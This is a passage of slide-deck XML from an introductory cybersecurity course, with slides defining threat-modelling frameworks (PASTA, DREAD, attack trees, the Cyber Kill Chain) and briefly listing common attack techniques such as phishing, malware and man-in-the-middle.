                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Involves gaining unauthorized access or privileges.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Google Shape;1469;p99"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Google Shape;1474;p100"/>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475" name="Google Shape;1475;p100"/>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76" name="Google Shape;1476;p100"/>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77" name="Google Shape;1477;p100"/>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78" name="Google Shape;1478;p100"/>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79" name="Google Shape;1479;p100"/>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80" name="Google Shape;1480;p100"/>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81" name="Google Shape;1481;p100"/>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82" name="Google Shape;1482;p100"/>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Threat Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1483" name="Google Shape;1483;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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PASTA:</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Process for Attack Simulation and Threat Analysis (PASTA) is a risk-centric methodology. It focuses on identifying and prioritizing attack scenarios based on business impact. PASTA follows a structured process, including steps like Collection, Analysis, Threat Modeling, Risk Ranking, Mitigation, and Validation.</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Collection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Identifying assets and gathering information.</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Analysis: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Assessing threats and vulnerabilities.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Threat Modeling:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Developing attack scenarios based on identified risks.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Risk Ranking:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Prioritizing attack scenarios based on business impact.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Mitigation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Developing strategies to mitigate the identified risks.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Validation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Verifying the effectiveness of mitigation strategies.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1484" name="Google Shape;1484;p100"/>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488"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489" name="Google Shape;1489;p10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490" name="Google Shape;1490;p10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491" name="Google Shape;1491;p10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492" name="Google Shape;1492;p10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493" name="Google Shape;1493;p10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494" name="Google Shape;1494;p10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495" name="Google Shape;1495;p10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496" name="Google Shape;1496;p10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497" name="Google Shape;1497;p10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Threat Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="53602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DREAD:</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DREAD is a framework that assesses risks based on five factors: Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability. It is commonly used to evaluate the severity of security vulnerabilities and prioritize them based on their impact.</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Damage Potential:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Measures the potential harm caused by the threat.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Reproducibility:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Indicates how easily the threat can be reproduced.</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Exploitability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Assesses the difficulty of exploiting the vulnerability.</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Affected Users: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Identifies the number of users impacted by the threat.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Discoverability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Measures how easy it is to discover the vulnerability.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1499" name="Google Shape;1499;p10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1"/>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215" name="Google Shape;215;p21"/>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216" name="Google Shape;216;p21"/>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217" name="Google Shape;217;p21"/>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218" name="Google Shape;218;p21"/>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219" name="Google Shape;219;p21"/>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220" name="Google Shape;220;p21"/>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221" name="Google Shape;221;p21"/>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222" name="Google Shape;222;p21"/>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TECHNIQUES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546835" y="1048582"/>
            <a:ext cx="16392425" cy="8760714"/>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Phishing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Email Phishing: Sending fraudulent emails with malicious links or attachments.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Spear Phishing: Customized phishing attacks targeting specific individuals or organizations.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Smishing: Phishing attacks conducted through SMS or text messages.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Social Engineering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Pretexting: Creating a fabricated scenario to extract information.</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Baiting: Offering something enticing to trick individuals into disclosing information.</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Impersonation: Pretending to be someone else to gain trust.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Malware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Viruses: Programs that attach themselves to legitimate files and spread when those files are executed.</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Worms: Self-replicating malware that spreads independently.</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Trojans: Malware disguised as legitimate software.</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Man-in-the-Middle (MitM) Attacks Techniques:</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Wi-Fi Eavesdropping: Capturing unencrypted Wi-Fi traffic.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="777240" marR="0" lvl="1" indent="-388620" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Medium"/>
                <a:ea typeface="Roboto Condensed Medium"/>
                <a:cs typeface="Roboto Condensed Medium"/>
                <a:sym typeface="Roboto Condensed Medium"/>
              </a:rPr>
              <a:t>DNS Spoofing: Manipulating DNS responses to redirect users to malicious sites.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Medium"/>
              <a:ea typeface="Roboto Condensed Medium"/>
              <a:cs typeface="Roboto Condensed Medium"/>
              <a:sym typeface="Roboto Condensed Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p21"/>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503"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1504" name="Google Shape;1504;p102"/>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505" name="Google Shape;1505;p102"/>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506" name="Google Shape;1506;p102"/>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507" name="Google Shape;1507;p102"/>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508" name="Google Shape;1508;p102"/>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509" name="Google Shape;1509;p102"/>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510" name="Google Shape;1510;p102"/>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511" name="Google Shape;1511;p102"/>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512" name="Google Shape;1512;p102"/>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Threat Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1513" name="Google Shape;1513;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="536028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Attack Trees:</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Description: Attack trees are graphical representations of potential attack scenarios. They break down a threat into various steps or conditions required for success, helping to visualize and analyze the potential paths an attacker might take.</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Root Node: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Represents the overall goal of the attack.</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Nodes:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Represent specific steps or conditions required for the attack.</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Leaves:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Depict the final outcomes or goals of the attack.</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Edges:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Connect nodes and represent the logical relationships between steps.</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Analysis:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Evaluates the likelihood and impact of each attack path.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1514" name="Google Shape;1514;p102"/>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103"/>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520" name="Google Shape;1520;p103"/>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521" name="Google Shape;1521;p103"/>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522" name="Google Shape;1522;p103"/>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523" name="Google Shape;1523;p103"/>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524" name="Google Shape;1524;p103"/>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525" name="Google Shape;1525;p103"/>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526" name="Google Shape;1526;p103"/>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527" name="Google Shape;1527;p103"/>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Different Threat Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1528" name="Google Shape;1528;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Kill Chain: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Cyber Kill Chain is a model that outlines the stages of a cyber attack, from initial reconnaissance to the final objective. It is widely used in cybersecurity to understand and defend against advanced persistent threats.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Reconnaissance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Gathering information about the target.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Weaponization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>: Creating or acquiring tools for the attack.</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Delivery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Transmitting the weaponized payload to the target.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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Taking advantage of vulnerabilities to execute the payload.</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Installation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Establishing a persistent presence on the target system.</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Command and Control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Maintaining communication and control over the compromised system.</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Actions on Objectives:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Achieving the attacker's final goal or objective.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1529" name="Google Shape;1529;p103"/>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04"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16082695" y="9071290"/>
            <a:ext cx="2008533" cy="610567"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2008533" h="610567" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2008533" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2008533" y="610568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="610568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1535" name="Google Shape;1535;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16082697" y="9071290"/>
            <a:ext cx="2008537" cy="610552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2678049" h="814070" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2678049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2678049" y="814070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="814070"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536" name="Google Shape;1536;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9906000"/>
            <a:ext cx="18288000" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="24384000" h="508000" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24384000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24384000" y="508000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="508000"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DFDFDF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1537" name="Google Shape;1537;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="1066802"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18288000" h="1066802" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18288000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18288000" y="1066802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1066802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-904190" r="-1798" b="-38236"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1538" name="Google Shape;1538;p104"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="3577">
            <a:off x="-9530" y="1066802"/>
            <a:ext cx="18307060" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1539" name="Google Shape;1539;p104"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="3577">
            <a:off x="-9530" y="9909376"/>
            <a:ext cx="18307060" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1540" name="Google Shape;1540;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348740" y="9954469"/>
            <a:ext cx="3931920" cy="27622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Anindya Sinha</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1541" name="Google Shape;1541;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13007340" y="9942195"/>
            <a:ext cx="3931920" cy="300774"/>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1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1542" name="Google Shape;1542;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216000" y="194502"/>
            <a:ext cx="17856000" cy="725424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Attack on Wireless Network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1543" name="Google Shape;1543;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="6331839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Kill Chain:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1"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0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The Cyber Kill Chain is a model that outlines the stages of a cyber attack, from initial reconnaissance to the final objective. It is widely used in cybersecurity to understand and defend against advanced persistent threats.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
